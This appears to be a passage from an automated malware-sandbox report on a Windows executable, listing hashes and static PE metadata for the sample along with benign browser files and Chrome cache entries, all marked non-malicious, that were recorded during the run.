                                                                                                                                                                                                                                                                              Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\dasherSettingSchema.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):854
                                                                                                                                                                                                                                                                              Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                              MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                              SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                              SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                              SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):2525
                                                                                                                                                                                                                                                                              Entropy (8bit):5.417954053901
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                                                                                                                              MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                                                                                                              SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                                                                                                                              SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                                                                                                              SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\offscreendocument.html

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):97
                                                                                                                                                                                                                                                                              Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                              MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                              SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                              SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                              SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\offscreendocument_main.js

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):122218
                                                                                                                                                                                                                                                                              Entropy (8bit):5.439997574414675
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                                                                                                              MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                                                                                                              SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                                                                                                              SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                                                                                                                              SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ha=ea(this);function r(a,b){if(b)a:{var c=ha;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\page_embed_script.js

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):291
                                                                                                                                                                                                                                                                              Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                              MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                              SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                              SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                              SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\service_worker_bin_prod.js

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):130866
                                                                                                                                                                                                                                                                              Entropy (8bit):5.425065147784983
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                                                                                                                              MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                                                                                                                              SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                                                                                                                              SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                                                                                                                              SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var fa=ea(this);function r(a,b){if(b)a:{var c=fa;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                                              Chrome Cache Entry: 429

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (816)
                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                              Size (bytes):821
                                                                                                                                                                                                                                                                              Entropy (8bit):5.174622399008442
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:9B/MDco6HBHslgT9lCuABATJfnuoB7HHHHHHHYqmffffffo:P/pHKlgZ01BAlvuSEqmffffffo
                                                                                                                                                                                                                                                                              MD5:B4184C0DECFEBB681640B9F430C28141
                                                                                                                                                                                                                                                                              SHA1:E8335FFC96527CCB2487451B8C2925DC7928CF00
                                                                                                                                                                                                                                                                              SHA-256:1A1E436924A0AB0FB931F8A4B0F6D7E0C256C5E6C4D74429B75422F555AFB604
                                                                                                                                                                                                                                                                              SHA-512:078E2C2F41D5BFD62857F9398B6F195B7CA51D63CD849FF8AC46B16650A19CC754CF68E7506083956CB857105DB7BB833F6D3B06DCB5EDD6EA39DBEC4D8E30DC
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                                              Preview:)]}'.["",["max kepler phillies","nvidia rtx 5090","tiktok banned","renegade raider in fortnite","denver nuggets portland trail blazers","librela for dogs","nyt strands hints december 19","weather forecast snow storm minnesota"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggesteventid":-6209228885730963161,"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]

                                                                                                                                                                                                                                                                              Chrome Cache Entry: 430

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                              Size (bytes):29
                                                                                                                                                                                                                                                                              Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                                              MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                                              SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                                              SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                                              SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                                              Preview:)]}'.{"update":{"promos":{}}}

                                                                                                                                                                                                                                                                              Chrome Cache Entry: 431

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                              Size (bytes):132739
                                                                                                                                                                                                                                                                              Entropy (8bit):5.4367649976402195
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3072:fikJQ7O4N5dTm+syHEt4W3XdQ4Q6yuSr/nUW2i6o:fLQ7HTt/sHdQ4Q6yDfUW8o
                                                                                                                                                                                                                                                                              MD5:C69D2F456BCA5EFB31778EFF0F44976B
                                                                                                                                                                                                                                                                              SHA1:48A178EBA80F105C405FFE966B44AFB2167BAB77
                                                                                                                                                                                                                                                                              SHA-256:AC761A5C3CB11E430512DDA73B8632BE68B02B7276680694E0C6342781F94121
                                                                                                                                                                                                                                                                              SHA-512:A35BA87EE748720075F9E3B2E2380971FCC5C5E59FC1F4C8EC9CEAE5C04263F560B1E057928B340CC9C4197371BF9C1CECAE510EF03088269020AA5CDD55ACB3
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                                              Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

                                                                                                                                                                                                                                                                              Chrome Cache Entry: 433

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                              Size (bytes):5162
                                                                                                                                                                                                                                                                              Entropy (8bit):5.3503139230837595
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
                                                                                                                                                                                                                                                                              MD5:7977D5A9F0D7D67DE08DECF635B4B519
                                                                                                                                                                                                                                                                              SHA1:4A66E5FC1143241897F407CEB5C08C36767726C1
                                                                                                                                                                                                                                                                              SHA-256:FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
                                                                                                                                                                                                                                                                              SHA-512:8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
                                                                                                                                                                                                                                                                              Preview:.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

                                                                                                                                                                                                                                                                              Chrome Cache Entry: 434

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                              Size (bytes):1660
                                                                                                                                                                                                                                                                              Entropy (8bit):4.301517070642596
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                                                                                                                                                              MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                                                                                                                              SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                                                                                                                                                              SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                                                                                                                              SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                                                                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

                                                                                                                                                                                                                                                                              Static File Info

                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                              Entropy (8bit):6.454644633254379
                                                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                              File name:pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              File size:147'968 bytes
                                                                                                                                                                                                                                                                              MD5:1d0fb45faa5b7a8b398703596d67c967
                                                                                                                                                                                                                                                                              SHA1:b326e3801b56b5ed86ae66249e6ea64cdefa1997
                                                                                                                                                                                                                                                                              SHA256:4e0453e61609c04bce1071d29f21abc82800e11261e284ca3250fd8655239456
                                                                                                                                                                                                                                                                              SHA512:9fa97e8611fd837f0756a505b8615076187d77fcf8aa5ff802944879e9d4d19ebccaea394b0c4327748c73da6bfca8acba6cdf12c5992056a798f28c064e0a63
                                                                                                                                                                                                                                                                              SSDEEP:3072:lOBRrLUOPed9xOi756fJnhsRSK2C22/m4ESZo3XRYzXIkQfydzdEpx:A/rLVPW0nsP2Xy+TJfUzW7
                                                                                                                                                                                                                                                                              TLSH:69E36C71A2C2A1B2CA4D33742A3E77FD9D709B222B04CDDBDBC4FC186E691D256B1416
                                                                                                                                                                                                                                                                              File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....ag.....................`....................@...........................#.............................................(......

                                                                                                                                                                                                                                                                              File Icon

                                                                                                                                                                                                                                                                              Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                                                                              Static PE Info

                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                              Entrypoint:0x4185c0
                                                                                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                              DLL Characteristics:NO_ISOLATION, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                              Time Stamp:0x676198A3 [Tue Dec 17 15:28:35 2024 UTC]
                                                                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                                                                              OS Version Major:6
                                                                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                                                                              File Version Major:6
                                                                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                                                                              Subsystem Version Major:6
                                                                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                                                                              Import Hash:8329c46c809815bc572f208fdd794284

                                                                                                                                                                                                                                                                              Entrypoint Preview

                                                                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                                                                              je 00007F22BC6BC7D5h
                                                                                                                                                                                                                                                                              jne 00007F22BC6BC7D3h
                                                                                                                                                                                                                                                                              mov eax, 000046E8h
